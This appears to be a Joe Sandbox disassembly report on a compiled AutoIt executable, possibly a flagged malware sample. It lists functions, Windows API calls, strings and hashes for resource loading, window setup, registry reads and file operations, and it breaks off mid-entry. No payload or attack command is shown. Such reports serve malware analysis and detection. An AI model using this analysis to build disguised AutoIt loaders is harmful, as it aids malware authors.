                    • String ID: This is a third-party compiled AutoIt script.$runas$%~
                    • API String ID: 529118366-536648910
                    • Opcode ID: 88e49a1f7dc0b864396ba5c0b77d42194df6b2ec602e9329e9b5be74b51be76e
                    • Instruction ID: be11ced121b3d91d8a5131258f2307695bbd0e41bd63790213bebdb755f6577a
                    • Opcode Fuzzy Hash: 88e49a1f7dc0b864396ba5c0b77d42194df6b2ec602e9329e9b5be74b51be76e
                    • Instruction Fuzzy Hash: 9651D870D04248EACB11ABB4DC09DED7B7DFF04351B048169FC96A22E1EABC5A59CB21
                    Function 00754FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 943 754fe9-755001 CreateStreamOnHGlobal 944 755021-755026 943->944 945 755003-75501a FindResourceExW 943->945 946 78dd5c-78dd6b LoadResource 945->946 947 755020 945->947 946->947 948 78dd71-78dd7f SizeofResource 946->948 947->944 948->947 949 78dd85-78dd90 LockResource 948->949 949->947 950 78dd96-78ddb4 949->950 950->947
                    APIs
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00754EEE,?,?,00000000,00000000), ref: 00754FF9
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00754EEE,?,?,00000000,00000000), ref: 00755010
                    • LoadResource.KERNEL32(?,00000000,?,?,00754EEE,?,?,00000000,00000000,?,?,?,?,?,?,00754F8F), ref: 0078DD60
                    • SizeofResource.KERNEL32(?,00000000,?,?,00754EEE,?,?,00000000,00000000,?,?,?,?,?,?,00754F8F), ref: 0078DD75
                    • LockResource.KERNEL32(Nu,?,?,00754EEE,?,?,00000000,00000000,?,?,?,?,?,?,00754F8F,00000000), ref: 0078DD88
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT$Nu
                    • API String ID: 3051347437-3259838383
                    • Opcode ID: 6d83dca23b2cbe05e8072746c874169e55b33d6c15f6910cb88ae2d64fe27bf8
                    • Instruction ID: a4704f59bdaed6061088ebfbb682a821a5678d8df2f85bebf4b8bc81eef094aa
                    • Opcode Fuzzy Hash: 6d83dca23b2cbe05e8072746c874169e55b33d6c15f6910cb88ae2d64fe27bf8
                    • Instruction Fuzzy Hash: AA115E75240700AFD7219B65DC58F6B7BB9EBC9B11F14816DF80AC62A0DBA6EC048660
                    Function 00754AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1007 754afe-754b5e call 7577c7 GetVersionExW call 757d2c 1012 754b64 1007->1012 1013 754c69-754c6b 1007->1013 1014 754b67-754b6c 1012->1014 1015 78db90-78db9c 1013->1015 1017 754c70-754c71 1014->1017 1018 754b72 1014->1018 1016 78db9d-78dba1 1015->1016 1019 78dba3 1016->1019 1020 78dba4-78dbb0 1016->1020 1021 754b73-754baa call 757e8c call 757886 1017->1021 1018->1021 1019->1020 1020->1016 1022 78dbb2-78dbb7 1020->1022 1030 78dc8d-78dc90 1021->1030 1031 754bb0-754bb1 1021->1031 1022->1014 1024 78dbbd-78dbc4 1022->1024 1024->1015 1026 78dbc6 1024->1026 1029 78dbcb-78dbce 1026->1029 1032 754bf1-754c08 GetCurrentProcess IsWow64Process 1029->1032 1033 78dbd4-78dbf2 1029->1033 1034 78dca9-78dcad 1030->1034 1035 78dc92 1030->1035 1031->1029 1036 754bb7-754bc2 1031->1036 1043 754c0d-754c1e 1032->1043 1044 754c0a 1032->1044 1033->1032 1037 78dbf8-78dbfe 1033->1037 1041 78dc98-78dca1 1034->1041 1042 78dcaf-78dcb8 1034->1042 1038 78dc95 1035->1038 1039 78dc13-78dc19 1036->1039 1040 754bc8-754bca 1036->1040 1047 78dc08-78dc0e 1037->1047 1048 78dc00-78dc03 1037->1048 1038->1041 1051 78dc1b-78dc1e 1039->1051 1052 78dc23-78dc29 1039->1052 1049 754bd0-754bd3 1040->1049 1050 78dc2e-78dc3a 1040->1050 1041->1034 1042->1038 1053 78dcba-78dcbd 1042->1053 1045 754c20-754c30 call 754c95 1043->1045 1046 754c89-754c93 GetSystemInfo 1043->1046 1044->1043 1064 754c32-754c3f call 754c95 1045->1064 1065 754c7d-754c87 GetSystemInfo 1045->1065 1059 754c56-754c66 1046->1059 1047->1032 1048->1032 1057 78dc5a-78dc5d 1049->1057 1058 754bd9-754be8 1049->1058 1054 78dc3c-78dc3f 1050->1054 1055 78dc44-78dc4a 1050->1055 1051->1032 1052->1032 1053->1041 1054->1032 1055->1032 1057->1032 1061 78dc63-78dc78 1057->1061 1062 78dc4f-78dc55 1058->1062 1063 754bee 1058->1063 1066 78dc7a-78dc7d 1061->1066 1067 78dc82-78dc88 1061->1067 1062->1032 1063->1032 1072 754c76-754c7b 1064->1072 1073 754c41-754c45 GetNativeSystemInfo 1064->1073 1069 754c47-754c4b 1065->1069 1066->1032 1067->1032 1069->1059 1071 754c4d-754c50 FreeLibrary 1069->1071 1071->1059 1072->1073 1073->1069
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00754B2B
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                    • GetCurrentProcess.KERNEL32(?,007DFAEC,00000000,00000000,?), ref: 00754BF8
                    • IsWow64Process.KERNEL32(00000000), ref: 00754BFF
                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00754C45
                    • FreeLibrary.KERNEL32(00000000), ref: 00754C50
                    • GetSystemInfo.KERNEL32(00000000), ref: 00754C81
                    • GetSystemInfo.KERNEL32(00000000), ref: 00754C8D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    • Opcode ID: 8e4a06c94404785f357898f638efb16836799ba174e04a28b46f89d669f40b1e
                    • Instruction ID: f027bf86429bec68dc5a4df62277296c7a6869378779e5eedee72b68b162d744
                    • Opcode Fuzzy Hash: 8e4a06c94404785f357898f638efb16836799ba174e04a28b46f89d669f40b1e
                    • Instruction Fuzzy Hash: 0B91F47158A7C0EEC731DB6884511EABFE5AF2A305B484D9ED4CB83A41D268E94CC729
                    Function 007B4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,0078E7C1), ref: 007B46A6
                    • FindFirstFileW.KERNELBASE(?,?), ref: 007B46B7
                    • FindClose.KERNEL32(00000000), ref: 007B46C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 30e98b3d14e12b28e9cb9d5a9e41e5e09ad428f7b9770993f1acea55547e2f8e
                    • Instruction ID: 771de4351ae7403efb3d2b186be8361d623f3431d2dd2cc155038801ed95bb84
                    • Opcode Fuzzy Hash: 30e98b3d14e12b28e9cb9d5a9e41e5e09ad428f7b9770993f1acea55547e2f8e
                    • Instruction Fuzzy Hash: 01E0D8314114005B86106738EC4D4EE776C9E06339F104716F836C10E0E7B869608599
                    Function 0075E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                    Download Yara Rule
                    Strings
                    • Variable must be of type 'Object'., xrefs: 0079428C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID: Variable must be of type 'Object'.
                    • API String ID: 0-109567571
                    • Opcode ID: dcc3aecfa06d15af3457d33c869d540efff5601a24c660964f7438967eb309af
                    • Instruction ID: 95a9f267e6a296420bc566d535ca4f98b5d62b42c2a166042859ec89a7b22fa5
                    • Opcode Fuzzy Hash: dcc3aecfa06d15af3457d33c869d540efff5601a24c660964f7438967eb309af
                    • Instruction Fuzzy Hash: A0A27D74A04205CBDB28CF58C484AEDB7B1FF58301F648069ED16AB351D7B9EE4ACB91
                    Function 00760B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00760BBB
                    • timeGetTime.WINMM ref: 00760E76
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00760FB3
                    • TranslateMessage.USER32(?), ref: 00760FC7
                    • DispatchMessageW.USER32(?), ref: 00760FD5
                    • Sleep.KERNEL32(0000000A), ref: 00760FDF
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 0076105A
                    • DestroyWindow.USER32 ref: 00761066
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00761080
                    • Sleep.KERNEL32(0000000A,?,?), ref: 007952AD
                    • TranslateMessage.USER32(?), ref: 0079608A
                    • DispatchMessageW.USER32(?), ref: 00796098
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007960AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                    • API String ID: 4003667617-3242690629
                    • Opcode ID: 36c0d0261f61a14ceed27c1eee8606b5dd816a4483a28069dc3a1b00abe0c3ec
                    • Instruction ID: 2d7f54c0d3614b7ea82c6189de1d7f19eeb9ee85f36e7085de8cc825c9c4182d
                    • Opcode Fuzzy Hash: 36c0d0261f61a14ceed27c1eee8606b5dd816a4483a28069dc3a1b00abe0c3ec
                    • Instruction Fuzzy Hash: 51B20670608751DFDB25DF24D888BAAB7E5FF84304F14891DF98A87291DB79E844CB82
                    Function 007B93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 007B91E9: __time64.LIBCMT ref: 007B91F3
                      • Part of subcall function 00755045: _fseek.LIBCMT ref: 0075505D
                    • __wsplitpath.LIBCMT ref: 007B94BE
                      • Part of subcall function 0077432E: __wsplitpath_helper.LIBCMT ref: 0077436E
                    • _wcscpy.LIBCMT ref: 007B94D1
                    • _wcscat.LIBCMT ref: 007B94E4
                    • __wsplitpath.LIBCMT ref: 007B9509
                    • _wcscat.LIBCMT ref: 007B951F
                    • _wcscat.LIBCMT ref: 007B9532
                      • Part of subcall function 007B922F: _memmove.LIBCMT ref: 007B9268
                      • Part of subcall function 007B922F: _memmove.LIBCMT ref: 007B9277
                    • _wcscmp.LIBCMT ref: 007B9479
                      • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AAE
                      • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AC1
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007B96DC
                    • _wcsncpy.LIBCMT ref: 007B974F
                    • DeleteFileW.KERNEL32(?,?), ref: 007B9785
                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007B979B
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007B97AC
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007B97BE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0
                    • Opcode ID: ffddaf2c6d941834750b61962af27614446ddac9a207643d3a980e9d3232543a
                    • Instruction ID: aa2e35405f704edf1e7b88826b231be6d2511a799ed9199bb0de428c1af414e4
                    • Opcode Fuzzy Hash: ffddaf2c6d941834750b61962af27614446ddac9a207643d3a980e9d3232543a
                    • Instruction Fuzzy Hash: DFC13CB1E00219AADF21DFA4CC85ADEB7BDEF45300F0040AAF619E7151DB789A448F65
                    Function 00753015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 75windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00753074
                    • RegisterClassExW.USER32(00000030), ref: 0075309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                    • LoadIconW.USER32(000000A9), ref: 007530F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 4f68569a94d2c6e9cdf9bb30b28d542010efe9f9d35d367098e30029dfa57f96
                    • Instruction ID: 9403641a300c7b2919ae543170a4ea8879335217ee0becef041cf6f4f941b8d0
                    • Opcode Fuzzy Hash: 4f68569a94d2c6e9cdf9bb30b28d542010efe9f9d35d367098e30029dfa57f96
                    • Instruction Fuzzy Hash: EB3129B1901349AFDB008FA4EC48AD9BBF4FF09320F14816AE591E62A0E3B94551CF95
                    Function 00753041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00753074
                    • RegisterClassExW.USER32(00000030), ref: 0075309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                    • LoadIconW.USER32(000000A9), ref: 007530F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: a5e8fd3a0534e81f5f29b6a997f6656bdd9aace13f89737145fc1204794f890f
                    • Instruction ID: 5e260e16bad78f3683d5be7ba9731e6fe021295f60e3800123c13f7a12cde20f
                    • Opcode Fuzzy Hash: a5e8fd3a0534e81f5f29b6a997f6656bdd9aace13f89737145fc1204794f890f
                    • Instruction Fuzzy Hash: 6421C5B1912218AFDB00DFA4EC49BDDBBF8FB08710F00812AF952A62A0E7B545548F95
                    Function 007571EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00754864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008162F8,?,007537C0,?), ref: 00754882
                      • Part of subcall function 0077074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007572C5), ref: 00770771
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00757308
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0078ECF1
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0078ED32
                    • RegCloseKey.ADVAPI32(?), ref: 0078ED70
                    • _wcscat.LIBCMT ref: 0078EDC9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177
                    • Opcode ID: 2d6209464c0ce0a719494951c4f9048b1fb5ee14cc8b4d8b31b9aa4dcd7cc597
                    • Instruction ID: 005faae5879a0ccc0939fd1aa292cd127e60744b8fa11cf52c8af542e102e27c
                    • Opcode Fuzzy Hash: 2d6209464c0ce0a719494951c4f9048b1fb5ee14cc8b4d8b31b9aa4dcd7cc597
                    • Instruction Fuzzy Hash: F8714C71509301DEC714EF25EC8589BBBFCFF58350B40852EF846831A1EBB8994ACBA1
                    Function 00753633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 761 753633-753681 763 7536e1-7536e3 761->763 764 753683-753686 761->764 763->764 767 7536e5 763->767 765 7536e7 764->765 766 753688-75368f 764->766 771 78d31c-78d34a call 7611d0 call 7611f3 765->771 772 7536ed-7536f0 765->772 768 753695-75369a 766->768 769 75375d-753765 PostQuitMessage 766->769 770 7536ca-7536d2 DefWindowProcW 767->770 773 7536a0-7536a2 768->773 774 78d38f-78d3a3 call 7b2a16 768->774 777 753711-753713 769->777 776 7536d8-7536de 770->776 807 78d34f-78d356 771->807 778 753715-75373c SetTimer RegisterWindowMessageW 772->778 779 7536f2-7536f3 772->779 780 753767-753776 call 754531 773->780 781 7536a8-7536ad 773->781 774->777 798 78d3a9 774->798 777->776 778->777 782 75373e-753749 CreatePopupMenu 778->782 785 78d2bf-78d2c2 779->785 786 7536f9-75370c KillTimer call 7544cb call 753114 779->786 780->777 787 7536b3-7536b8 781->787 788 78d374-78d37b 781->788 782->777 792 78d2f8-78d317 MoveWindow 785->792 793 78d2c4-78d2c6 785->793 786->777 796 7536be-7536c4 787->796 797 75374b-75375b call 7545df 787->797 788->770 795 78d381-78d38a call 7a817e 788->795 792->777 801 78d2c8-78d2cb 793->801 802 78d2e7-78d2f3 SetFocus 793->802 795->770 796->770 796->807 797->777 798->770 801->796 808 78d2d1-78d2e2 call 7611d0 801->808 802->777 807->770 811 78d35c-78d36f call 7544cb call 7543db 807->811 808->777 811->770
                    APIs
                    • DefWindowProcW.USER32(?,?,?,?), ref: 007536D2
                    • KillTimer.USER32(?,00000001), ref: 007536FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0075371F
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0075372A
                    • CreatePopupMenu.USER32 ref: 0075373E
                    • PostQuitMessage.USER32(00000000), ref: 0075375F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated$%~
                    • API String ID: 129472671-4286669069
                    • Opcode ID: 9497ad97297347907eb35678bf9d9cf50dfdd8f71bb87b5be5dc7c357a071c56
                    • Instruction ID: fd0cfb8dceadd1170e529cfd9a7ede81d4b803943a5ea9191186ba7dcac20184
                    • Opcode Fuzzy Hash: 9497ad97297347907eb35678bf9d9cf50dfdd8f71bb87b5be5dc7c357a071c56
                    • Instruction Fuzzy Hash: DB4129B1600109EBDB246B64DC4DBF93768FB04382F04452DFD42D22B1EAEC9E689365
                    Function 00753A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00753A62
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00753A71
                    • LoadIconW.USER32(00000063), ref: 00753A88
                    • LoadIconW.USER32(000000A4), ref: 00753A9A
                    • LoadIconW.USER32(000000A2), ref: 00753AAC
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00753AD2
                    • RegisterClassExW.USER32(?), ref: 00753B28
                      • Part of subcall function 00753041: GetSysColorBrush.USER32(0000000F), ref: 00753074
                      • Part of subcall function 00753041: RegisterClassExW.USER32(00000030), ref: 0075309E
                      • Part of subcall function 00753041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                      • Part of subcall function 00753041: InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                      • Part of subcall function 00753041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                      • Part of subcall function 00753041: LoadIconW.USER32(000000A9), ref: 007530F2
                      • Part of subcall function 00753041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: #$0$AutoIt v3
                    • API String ID: 423443420-4155596026
                    • Opcode ID: 6832bf939f15d1375eeed808a9c124af93e4932c9b4466404dfb7148411e66c6
                    • Instruction ID: b4df5ccc9396759435564d75dbc4a76c226749bcc5c70d11a0387f1fbf881879
                    • Opcode Fuzzy Hash: 6832bf939f15d1375eeed808a9c124af93e4932c9b4466404dfb7148411e66c6
                    • Instruction Fuzzy Hash: 59212E71D41304AFEB109FA4EC09BDD7BB9FF08721F00812AF544A62A0E3B95664CF54
                    Function 00753778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
